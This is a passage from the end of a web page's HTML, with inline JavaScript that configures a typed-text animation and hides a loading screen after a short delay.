stringsElement: $('.typed-strings'), typeSpeed: 100, backDelay: 1500, loop: true, contentType: 'html', // or text // defaults to false for infinite loop loopCount: false, callback: function () { null; }, resetCallback: function () { newTyped(); } }); }); document.addEventListener("DOMContentLoaded", function () { // Simulate a delay (you can replace this with actual loading logic) setTimeout(function () { document.getElementById("loader-container").style.display = "none"; document.getElementById("main-content").style.display = "block"; }, 1500); // 2000 milliseconds (2 seconds) for demonstration purposes }); </script> </body> </html>